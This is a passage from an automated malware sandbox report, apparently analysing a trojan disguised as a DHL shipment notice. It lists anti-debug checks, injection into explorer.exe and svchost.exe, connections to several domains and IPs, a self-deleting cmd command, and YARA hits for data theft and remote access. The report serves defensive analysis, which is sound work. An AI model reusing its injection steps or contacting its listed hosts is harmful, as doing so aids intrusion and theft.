          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_030F070D mov eax, dword ptr fs:[00000030h]17_2_030F070D
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_030F070D mov eax, dword ptr fs:[00000030h]17_2_030F070D
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_0305A70E mov eax, dword ptr fs:[00000030h]17_2_0305A70E
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_0305A70E mov eax, dword ptr fs:[00000030h]17_2_0305A70E
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_0304F716 mov eax, dword ptr fs:[00000030h]17_2_0304F716
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_030BFF10 mov eax, dword ptr fs:[00000030h]17_2_030BFF10
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_030BFF10 mov eax, dword ptr fs:[00000030h]17_2_030BFF10
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_03024F2E mov eax, dword ptr fs:[00000030h]17_2_03024F2E
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_03024F2E mov eax, dword ptr fs:[00000030h]17_2_03024F2E
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_0305E730 mov eax, dword ptr fs:[00000030h]17_2_0305E730
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_0304B73D mov eax, dword ptr fs:[00000030h]17_2_0304B73D
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_0304B73D mov eax, dword ptr fs:[00000030h]17_2_0304B73D
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_0303EF40 mov eax, dword ptr fs:[00000030h]17_2_0303EF40
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_0303FF60 mov eax, dword ptr fs:[00000030h]17_2_0303FF60
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_030F8F6A mov eax, dword ptr fs:[00000030h]17_2_030F8F6A
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_03038794 mov eax, dword ptr fs:[00000030h]17_2_03038794
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_030A7794 mov eax, dword ptr fs:[00000030h]17_2_030A7794
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_030A7794 mov eax, dword ptr fs:[00000030h]17_2_030A7794
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_030A7794 mov eax, dword ptr fs:[00000030h]17_2_030A7794
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_030637F5 mov eax, dword ptr fs:[00000030h]17_2_030637F5
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_0302C600 mov eax, dword ptr fs:[00000030h]17_2_0302C600
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_0302C600 mov eax, dword ptr fs:[00000030h]17_2_0302C600
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_0302C600 mov eax, dword ptr fs:[00000030h]17_2_0302C600
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_03058E00 mov eax, dword ptr fs:[00000030h]17_2_03058E00
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_030E1608 mov eax, dword ptr fs:[00000030h]17_2_030E1608
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_0305A61C mov eax, dword ptr fs:[00000030h]17_2_0305A61C
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_0305A61C mov eax, dword ptr fs:[00000030h]17_2_0305A61C
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_0302E620 mov eax, dword ptr fs:[00000030h]17_2_0302E620
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_030DFE3F mov eax, dword ptr fs:[00000030h]17_2_030DFE3F
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_03037E41 mov eax, dword ptr fs:[00000030h]17_2_03037E41
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_03037E41 mov eax, dword ptr fs:[00000030h]17_2_03037E41
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_03037E41 mov eax, dword ptr fs:[00000030h]17_2_03037E41
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_03037E41 mov eax, dword ptr fs:[00000030h]17_2_03037E41
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_03037E41 mov eax, dword ptr fs:[00000030h]17_2_03037E41
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_03037E41 mov eax, dword ptr fs:[00000030h]17_2_03037E41
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_030EAE44 mov eax, dword ptr fs:[00000030h]17_2_030EAE44
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_030EAE44 mov eax, dword ptr fs:[00000030h]17_2_030EAE44
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_0303766D mov eax, dword ptr fs:[00000030h]17_2_0303766D
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_0304AE73 mov eax, dword ptr fs:[00000030h]17_2_0304AE73
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_0304AE73 mov eax, dword ptr fs:[00000030h]17_2_0304AE73
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_0304AE73 mov eax, dword ptr fs:[00000030h]17_2_0304AE73
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_0304AE73 mov eax, dword ptr fs:[00000030h]17_2_0304AE73
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_0304AE73 mov eax, dword ptr fs:[00000030h]17_2_0304AE73
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_030BFE87 mov eax, dword ptr fs:[00000030h]17_2_030BFE87
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_030F0EA5 mov eax, dword ptr fs:[00000030h]17_2_030F0EA5
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_030F0EA5 mov eax, dword ptr fs:[00000030h]17_2_030F0EA5
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_030F0EA5 mov eax, dword ptr fs:[00000030h]17_2_030F0EA5
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_030A46A7 mov eax, dword ptr fs:[00000030h]17_2_030A46A7
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_03068EC7 mov eax, dword ptr fs:[00000030h]17_2_03068EC7
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_030536CC mov eax, dword ptr fs:[00000030h]17_2_030536CC
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_030DFEC0 mov eax, dword ptr fs:[00000030h]17_2_030DFEC0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_030F8ED6 mov eax, dword ptr fs:[00000030h]17_2_030F8ED6
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_030376E2 mov eax, dword ptr fs:[00000030h]17_2_030376E2
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_030516E0 mov ecx, dword ptr fs:[00000030h]17_2_030516E0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_0302AD30 mov eax, dword ptr fs:[00000030h]17_2_0302AD30
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_03033D34 mov eax, dword ptr fs:[00000030h]17_2_03033D34
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_03033D34 mov eax, dword ptr fs:[00000030h]17_2_03033D34
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_03033D34 mov eax, dword ptr fs:[00000030h]17_2_03033D34
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_03033D34 mov eax, dword ptr fs:[00000030h]17_2_03033D34
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_03033D34 mov eax, dword ptr fs:[00000030h]17_2_03033D34
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_03033D34 mov eax, dword ptr fs:[00000030h]17_2_03033D34
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_03033D34 mov eax, dword ptr fs:[00000030h]17_2_03033D34
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_03033D34 mov eax, dword ptr fs:[00000030h]17_2_03033D34
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_03033D34 mov eax, dword ptr fs:[00000030h]17_2_03033D34
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_03033D34 mov eax, dword ptr fs:[00000030h]17_2_03033D34
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_03033D34 mov eax, dword ptr fs:[00000030h]17_2_03033D34
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_03033D34 mov eax, dword ptr fs:[00000030h]17_2_03033D34
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_03033D34 mov eax, dword ptr fs:[00000030h]17_2_03033D34
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_030EE539 mov eax, dword ptr fs:[00000030h]17_2_030EE539
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_030F8D34 mov eax, dword ptr fs:[00000030h]17_2_030F8D34
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_030AA537 mov eax, dword ptr fs:[00000030h]17_2_030AA537
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_03054D3B mov eax, dword ptr fs:[00000030h]17_2_03054D3B
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_03054D3B mov eax, dword ptr fs:[00000030h]17_2_03054D3B
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_03054D3B mov eax, dword ptr fs:[00000030h]17_2_03054D3B
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_03063D43 mov eax, dword ptr fs:[00000030h]17_2_03063D43
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_030A3540 mov eax, dword ptr fs:[00000030h]17_2_030A3540
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_030D3D40 mov eax, dword ptr fs:[00000030h]17_2_030D3D40
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_03047D50 mov eax, dword ptr fs:[00000030h]17_2_03047D50
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_0304C577 mov eax, dword ptr fs:[00000030h]17_2_0304C577
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_0304C577 mov eax, dword ptr fs:[00000030h]17_2_0304C577
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_03052581 mov eax, dword ptr fs:[00000030h]17_2_03052581
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_03052581 mov eax, dword ptr fs:[00000030h]17_2_03052581
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_03052581 mov eax, dword ptr fs:[00000030h]17_2_03052581
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_03052581 mov eax, dword ptr fs:[00000030h]17_2_03052581
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_03022D8A mov eax, dword ptr fs:[00000030h]17_2_03022D8A
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_03022D8A mov eax, dword ptr fs:[00000030h]17_2_03022D8A
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_03022D8A mov eax, dword ptr fs:[00000030h]17_2_03022D8A
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_03022D8A mov eax, dword ptr fs:[00000030h]17_2_03022D8A
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_03022D8A mov eax, dword ptr fs:[00000030h]17_2_03022D8A
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_0305FD9B mov eax, dword ptr fs:[00000030h]17_2_0305FD9B
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_0305FD9B mov eax, dword ptr fs:[00000030h]17_2_0305FD9B
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_030F05AC mov eax, dword ptr fs:[00000030h]17_2_030F05AC
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_030F05AC mov eax, dword ptr fs:[00000030h]17_2_030F05AC
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_030535A1 mov eax, dword ptr fs:[00000030h]17_2_030535A1
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_03051DB5 mov eax, dword ptr fs:[00000030h]17_2_03051DB5
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_03051DB5 mov eax, dword ptr fs:[00000030h]17_2_03051DB5
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_03051DB5 mov eax, dword ptr fs:[00000030h]17_2_03051DB5
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_030A6DC9 mov eax, dword ptr fs:[00000030h]17_2_030A6DC9
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_030A6DC9 mov eax, dword ptr fs:[00000030h]17_2_030A6DC9
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_030A6DC9 mov eax, dword ptr fs:[00000030h]17_2_030A6DC9
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_030A6DC9 mov ecx, dword ptr fs:[00000030h]17_2_030A6DC9
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_030A6DC9 mov eax, dword ptr fs:[00000030h]17_2_030A6DC9
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_030A6DC9 mov eax, dword ptr fs:[00000030h]17_2_030A6DC9
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_0303D5E0 mov eax, dword ptr fs:[00000030h]17_2_0303D5E0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_0303D5E0 mov eax, dword ptr fs:[00000030h]17_2_0303D5E0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_030EFDE2 mov eax, dword ptr fs:[00000030h]17_2_030EFDE2
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_030EFDE2 mov eax, dword ptr fs:[00000030h]17_2_030EFDE2
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_030EFDE2 mov eax, dword ptr fs:[00000030h]17_2_030EFDE2
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_030EFDE2 mov eax, dword ptr fs:[00000030h]17_2_030EFDE2
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_030D8DF1 mov eax, dword ptr fs:[00000030h]17_2_030D8DF1
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_030A6C0A mov eax, dword ptr fs:[00000030h]17_2_030A6C0A
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_030A6C0A mov eax, dword ptr fs:[00000030h]17_2_030A6C0A
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_030A6C0A mov eax, dword ptr fs:[00000030h]17_2_030A6C0A
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_030A6C0A mov eax, dword ptr fs:[00000030h]17_2_030A6C0A
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_030F740D mov eax, dword ptr fs:[00000030h]17_2_030F740D
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_030F740D mov eax, dword ptr fs:[00000030h]17_2_030F740D
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_030F740D mov eax, dword ptr fs:[00000030h]17_2_030F740D
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_030E1C06 mov eax, dword ptr fs:[00000030h]17_2_030E1C06
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_030E1C06 mov eax, dword ptr fs:[00000030h]17_2_030E1C06
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_030E1C06 mov eax, dword ptr fs:[00000030h]17_2_030E1C06
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_030E1C06 mov eax, dword ptr fs:[00000030h]17_2_030E1C06
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_030E1C06 mov eax, dword ptr fs:[00000030h]17_2_030E1C06
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_030E1C06 mov eax, dword ptr fs:[00000030h]17_2_030E1C06
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_030E1C06 mov eax, dword ptr fs:[00000030h]17_2_030E1C06
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_030E1C06 mov eax, dword ptr fs:[00000030h]17_2_030E1C06
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_030E1C06 mov eax, dword ptr fs:[00000030h]17_2_030E1C06
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_030E1C06 mov eax, dword ptr fs:[00000030h]17_2_030E1C06
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_030E1C06 mov eax, dword ptr fs:[00000030h]17_2_030E1C06
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_030E1C06 mov eax, dword ptr fs:[00000030h]17_2_030E1C06
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_030E1C06 mov eax, dword ptr fs:[00000030h]17_2_030E1C06
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_030E1C06 mov eax, dword ptr fs:[00000030h]17_2_030E1C06
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_0305BC2C mov eax, dword ptr fs:[00000030h]17_2_0305BC2C
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_0305A44B mov eax, dword ptr fs:[00000030h]17_2_0305A44B
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_030BC450 mov eax, dword ptr fs:[00000030h]17_2_030BC450
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_030BC450 mov eax, dword ptr fs:[00000030h]17_2_030BC450
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_0304746D mov eax, dword ptr fs:[00000030h]17_2_0304746D
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_0305AC7B mov eax, dword ptr fs:[00000030h]17_2_0305AC7B
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_0305AC7B mov eax, dword ptr fs:[00000030h]17_2_0305AC7B
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_0305AC7B mov eax, dword ptr fs:[00000030h]17_2_0305AC7B
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_0305AC7B mov eax, dword ptr fs:[00000030h]17_2_0305AC7B
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_0305AC7B mov eax, dword ptr fs:[00000030h]17_2_0305AC7B
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_0305AC7B mov eax, dword ptr fs:[00000030h]17_2_0305AC7B
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_0305AC7B mov eax, dword ptr fs:[00000030h]17_2_0305AC7B
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_0305AC7B mov eax, dword ptr fs:[00000030h]17_2_0305AC7B
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_0305AC7B mov eax, dword ptr fs:[00000030h]17_2_0305AC7B
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_0305AC7B mov eax, dword ptr fs:[00000030h]17_2_0305AC7B
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_0305AC7B mov eax, dword ptr fs:[00000030h]17_2_0305AC7B
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_0303849B mov eax, dword ptr fs:[00000030h]17_2_0303849B
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_030F8CD6 mov eax, dword ptr fs:[00000030h]17_2_030F8CD6
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_030E14FB mov eax, dword ptr fs:[00000030h]17_2_030E14FB
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_030A6CF0 mov eax, dword ptr fs:[00000030h]17_2_030A6CF0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_030A6CF0 mov eax, dword ptr fs:[00000030h]17_2_030A6CF0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_030A6CF0 mov eax, dword ptr fs:[00000030h]17_2_030A6CF0
          Source: C:\Users\user\AppData\Local\Temp\aeokw.exe Process queried: DebugPort
          Source: C:\Windows\SysWOW64\svchost.exe Process queried: DebugPort
          Source: C:\Users\user\AppData\Local\Temp\aeokw.exe Code function: 2_2_0040ACE0 LdrLoadDll
          Source: C:\Users\user\AppData\Local\Temp\aeokw.exe Code function: 1_2_00D743CC SetUnhandledExceptionFilter,UnhandledExceptionFilter
          Source: C:\Users\user\AppData\Local\Temp\aeokw.exe Code function: 1_2_00D7439B SetUnhandledExceptionFilter
          Source: C:\Users\user\AppData\Local\Temp\aeokw.exe Code function: 2_2_00D743CC SetUnhandledExceptionFilter,UnhandledExceptionFilter
          Source: C:\Users\user\AppData\Local\Temp\aeokw.exe Code function: 2_2_00D7439B SetUnhandledExceptionFilter

          HIPS / PFW / Operating System Protection Evasion

          Source: C:\Windows\explorer.exe | Network Connect: 23.227.38.74 80
          Source: C:\Windows\explorer.exe | Domain query: www.ultrakill.xyz
          Source: C:\Windows\explorer.exe | Network Connect: 3.64.163.50 80
          Source: C:\Windows\explorer.exe | Network Connect: 142.250.185.115 80
          Source: C:\Windows\explorer.exe | Domain query: www.rtpholywin99.com
          Source: C:\Windows\explorer.exe | Domain query: www.keilaniclothing.com
          Source: C:\Users\user\AppData\Local\Temp\aeokw.exe | Section unmapped: C:\Windows\SysWOW64\svchost.exe base address: 2F0000
          Source: C:\Users\user\AppData\Local\Temp\aeokw.exe | Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
          Source: C:\Users\user\AppData\Local\Temp\aeokw.exe | Section loaded: unknown target: C:\Windows\SysWOW64\svchost.exe protection: execute and read and write
          Source: C:\Users\user\AppData\Local\Temp\aeokw.exe | Section loaded: unknown target: C:\Windows\SysWOW64\svchost.exe protection: execute and read and write
          Source: C:\Windows\SysWOW64\svchost.exe | Section loaded: unknown target: C:\Windows\explorer.exe protection: read write
          Source: C:\Windows\SysWOW64\svchost.exe | Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
          Source: C:\Users\user\AppData\Local\Temp\aeokw.exe | Thread APC queued: target process: C:\Windows\explorer.exe
          Source: C:\Users\user\AppData\Local\Temp\aeokw.exe | Thread register set: target process: 3616
          Source: C:\Windows\SysWOW64\svchost.exe | Thread register set: target process: 3616
          Source: C:\Users\user\AppData\Local\Temp\aeokw.exe | Process created: C:\Users\user\AppData\Local\Temp\aeokw.exe C:\Users\user\AppData\Local\Temp\aeokw.exe C:\Users\user\AppData\Local\Temp\fnnok
          Source: C:\Windows\SysWOW64\svchost.exe | Process created: C:\Windows\SysWOW64\cmd.exe /c del "C:\Users\user\AppData\Local\Temp\aeokw.exe"
          Source: explorer.exe, 00000005.00000000.284344816.0000000000B50000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000005.00000000.290054860.0000000005E60000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000000.342712114.0000000000B50000.00000002.00000001.00040000.00000000.sdmp | Binary or memory string: Shell_TrayWnd
          Source: explorer.exe, 00000005.00000000.299103436.00000000005C8000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000005.00000000.284344816.0000000000B50000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000005.00000000.342712114.0000000000B50000.00000002.00000001.00040000.00000000.sdmp | Binary or memory string: Progman
          Source: explorer.exe, 00000005.00000000.284344816.0000000000B50000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000005.00000000.342712114.0000000000B50000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000005.00000000.263202422.0000000000B50000.00000002.00000001.00040000.00000000.sdmp | Binary or memory string: Program Manager,
          Source: explorer.exe, 00000005.00000000.284344816.0000000000B50000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000005.00000000.342712114.0000000000B50000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000005.00000000.263202422.0000000000B50000.00000002.00000001.00040000.00000000.sdmp | Binary or memory string: Progmanlock
          Source: C:\Users\user\AppData\Local\Temp\aeokw.exe | Code function: 1_2_00D73283 cpuid
          Source: C:\Users\user\AppData\Local\Temp\aeokw.exe | Code function: 1_2_00D73EC8 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter
          Source: C:\Users\user\Desktop\DHL SHIPMENT NOTIFICATION 1146789443.exe | Code function: 0_2_00403646 EntryPoint,SetErrorMode,GetVersionExW,GetVersionExW,GetVersionExW,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,ExitProcess,OleUninitialize,ExitProcess,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess

          Stealing of Sensitive Information

          Source: Yara match | File source: 2.0.aeokw.exe.400000.8.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 1.2.aeokw.exe.12a0000.1.raw.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 2.0.aeokw.exe.400000.6.raw.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 1.2.aeokw.exe.12a0000.1.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 2.2.aeokw.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 2.0.aeokw.exe.400000.6.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 2.0.aeokw.exe.400000.4.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 2.2.aeokw.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 2.0.aeokw.exe.400000.8.raw.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 00000005.00000000.294568326.000000000E814000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
          Source: Yara match | File source: 00000002.00000002.322163759.0000000000DD0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara match | File source: 00000002.00000002.322197992.0000000001100000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara match | File source: 00000002.00000000.256268925.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Source: Yara match | File source: 00000002.00000002.321951084.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Source: Yara match | File source: 00000005.00000000.310303298.000000000E814000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
          Source: Yara match | File source: 00000011.00000002.513829968.0000000002E30000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara match | File source: 00000011.00000002.512812495.0000000002380000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara match | File source: 00000011.00000002.513722693.0000000002E00000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara match | File source: 00000001.00000002.258171974.00000000012A0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
          Source: Yara match | File source: 00000002.00000000.254937698.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY

          Remote Access Functionality

          Source: Yara match | File source: 2.0.aeokw.exe.400000.8.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 1.2.aeokw.exe.12a0000.1.raw.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 2.0.aeokw.exe.400000.6.raw.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 1.2.aeokw.exe.12a0000.1.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 2.2.aeokw.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 2.0.aeokw.exe.400000.6.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 2.0.aeokw.exe.400000.4.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 2.2.aeokw.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 2.0.aeokw.exe.400000.8.raw.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 00000005.00000000.294568326.000000000E814000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
          Source: Yara match | File source: 00000002.00000002.322163759.0000000000DD0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara match | File source: 00000002.00000002.322197992.0000000001100000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara match | File source: 00000002.00000000.256268925.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Source: Yara match | File source: 00000002.00000002.321951084.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Source: Yara match | File source: 00000005.00000000.310303298.000000000E814000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
          Source: Yara match | File source: 00000011.00000002.513829968.0000000002E30000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara match | File source: 00000011.00000002.512812495.0000000002380000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara match | File source: 00000011.00000002.513722693.0000000002E00000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
